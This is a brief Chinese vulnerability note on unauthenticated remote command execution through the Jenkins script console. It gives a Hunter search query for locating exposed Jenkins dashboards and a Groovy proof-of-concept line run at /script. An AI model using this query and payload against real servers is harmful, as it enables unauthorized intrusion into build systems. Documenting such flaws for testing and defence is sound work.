Jenkins 未授权远程命令执行漏洞
一、漏洞简介
Jenkins是一个开源的、提供友好操作界面的持续集成(CI)工具,起源于Hudson(Hudson是商用的),主要用于持续、自动的构建/测试软件项目、监控外部任务的运行。Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞进入后台管理服务,通过脚本执行界面从而获取服务器权限。
二、影响版本
- Jenkins
三、资产测绘
- hunter
app.name="Jenkins Dashboard" - 特征
四、漏洞复现
/script
println "whoami".execute().text